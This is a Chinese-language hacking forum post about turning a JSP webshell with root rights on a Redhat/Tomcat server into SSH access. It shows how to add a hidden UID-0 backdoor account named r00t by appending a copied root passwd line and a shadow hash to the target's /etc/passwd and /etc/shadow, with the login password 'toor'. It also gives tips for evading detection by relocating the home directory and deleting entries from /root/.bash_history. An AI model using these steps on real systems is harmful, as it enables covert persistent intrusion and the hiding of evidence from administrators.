JSPWebShell的进一步提权

对方环境：Readhat+Tomcat+JSP+MYSQL5

 

 

shell是root系统权限 也许有的同学问，都是root了还进一步~进到哪？

嗯~说下把，jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧 不吐槽了，在这种情况下呢，我们要远程登陆他的ssh 需要怎么做？

 

 

嗯 一般人都懂，直接编辑/etc/passwd和/etc/shadow呗~好吧

 

 

通过搜索 发现网上转来转去的并无效果，也就是通常说的无密码即可进入的添加账号~本人测试未果，也许人品？不管~进入backtrack5 直接

cat /etc/passwd

复制root那一行 然后继续

cat /etc/shadow

复制root那一行~~

获得

root:x:0:0:root:/root:/bin/bash

root:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

 

 

 

这个就是root的密码了  为了不重复 我们改一些东西吧

root是用户 我们改为r00t /root是主目录 我们也要改  就该为/home/root吧~！为什么？因为如果是/root 你登陆后所操作的一切都会被记录到history中 有的同学问，直接history -c清除不就OK拉~我想说的是 这样的话很容易引起管理员发觉~~

如果这样不小心被记录了，请不要急着清除~进入到shell或者创建用户后  再次登陆然后编辑/root/.bash_history文件把自己操作的命令删除即可！

ok~改变后就是

r00t:x:0:0:root:/home/root:/bin/bash

r00t:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

 

 

 

把第一行加入/etc/passwd 第二行加入/etc/shadow然后链接即可！

登陆账号:r00t 密码:toor

 

 

 

纯属科普 大大牛请无视~